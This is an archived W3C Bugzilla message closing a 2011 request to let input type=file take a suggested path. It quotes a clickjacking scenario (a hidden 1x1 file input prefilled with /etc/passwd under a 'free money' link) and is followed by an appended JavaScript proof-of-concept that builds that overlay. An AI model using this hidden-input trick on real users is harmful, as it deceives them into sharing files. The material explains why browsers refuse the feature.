
[Bug 13119] Make the @value attribute in <input> when type="file" work as a suggestion for the OS file picker

From: <bugzilla@jessica.w3.org>
Date: Fri, 08 Jul 2011 10:41:16 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1Qf8Um-00033W-7u@jessica.w3.org>

brunoais <brunoaiss@gmail.com> changed:

           What    |Removed                     |Added
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME

--- Comment #8 from brunoais <brunoaiss@gmail.com> 2011-07-08 10:41:14 UTC ---
(In reply to comment #7)
> I agree with Boris, it's unlikely that we'd implement this in Firefox. It's
> simply too easy to trick the user into selecting a file that they don't intend
> to share. Here's one attack scenario:
> 1. Add a <input type=file value="/etc/passwd"> on a page
> 2. Use CSS to make the <input> 1x1 pixels large
> 3. Put a <a href="money.html">Click here for free money</a> link on the page
> 4. Use javascript to detect when the user hovers the above link
> 5. Use CSS to position the <input> just under the cursor.
> Once the user attempts to click the link it will instead open a filepicker.
> Most people's reaction to this would be "get out of my way stupid dialog, I
> want to click my free-money link" and simply press "OK" in the file picker.
> This is generally known as the "whatever button". When faced with a dialog
> people generally don't bother reading its contents but instead think "whatever"
> and press any button that will allow them to continue with their task.

I also go with whatever. But instead, I ALWAYS use the cancel button instead of
the ok button. Still... I see what you mean...

I'll do a worksforme as this is not going to be easy enough to implement.

Received on Friday, 8 July 2011 10:41:17 UTC
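The five-step scenario quoted in comment #7, written out as an added proof-of-concept; this is not code from the bug thread, the spec, or any browser. It assumes a browser for the DOM part (the geometry and probe helpers are pure and run anywhere), and the names overlayStyleFor, probePrefill and installPoc are chosen here. The check a practitioner wants first is probePrefill: the value content attribute does not apply to input type=file, and assigning a non-empty string to .value throws InvalidStateError in shipping browsers, so the scenario only matters in a browser where the probe reports the attribute honoured.

```javascript
// Added example: proof-of-concept for the "file picker under the cursor"
// scenario quoted in comment #7. Not from the bug thread or any browser.
// DOM code only runs in a browser; the helpers below are pure.

const SUGGESTED_PATH = "/etc/passwd"; // the path used in the quoted scenario

// Steps 2 and 5: CSS that parks a 1x1 pixel, invisible input directly under
// the pointer. clientX/clientY are viewport-relative, so position:fixed
// needs no scroll correction.
function overlayStyleFor(clientX, clientY) {
  return {
    position: "fixed",
    left: `${clientX}px`,
    top: `${clientY}px`,
    width: "1px",
    height: "1px",
    opacity: "0",
    zIndex: "2147483647", // stack above the decoy link
  };
}

// The check to run before worrying about the scenario: can a page pre-select
// a path at all? Reports whether the value attribute was honoured and
// whether assigning .value threw (it does in shipping browsers).
function probePrefill(input, path) {
  const attrHonoured = input.value === path;
  let assignmentThrew = false;
  try {
    input.value = path;
  } catch (e) {
    assignmentThrew = true;
  }
  return { attrHonoured, assignmentThrew, valueAfter: input.value };
}

// Steps 1, 3 and 4: build the hidden input and the decoy link, then keep
// re-positioning the input under the pointer while it is over the link.
// mousemove rather than mouseover so the input follows a moving cursor.
function installPoc(doc) {
  const input = doc.createElement("input");
  input.type = "file";
  input.setAttribute("value", SUGGESTED_PATH);             // step 1 (ignored by browsers)
  Object.assign(input.style, overlayStyleFor(-10, -10));   // step 2, parked off-screen

  const link = doc.createElement("a");
  link.href = "money.html";
  link.textContent = "Click here for free money";          // step 3

  link.addEventListener("mousemove", (ev) => {             // step 4
    Object.assign(input.style, overlayStyleFor(ev.clientX, ev.clientY)); // step 5
  });

  doc.body.append(link, input);
  return { link, input, probe: probePrefill(input, SUGGESTED_PATH) };
}

if (typeof document !== "undefined") {
  const { probe } = installPoc(document);
  console.log("value attribute honoured:", probe.attrHonoured,
              "| .value assignment threw:", probe.assignmentThrew);
}
```

Load this in a page and hover the link: the picker opens on click, but with no path pre-selected, which is exactly why the attack described in comment #7 is only a concern if a browser ever implemented the suggestion this bug asked for.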
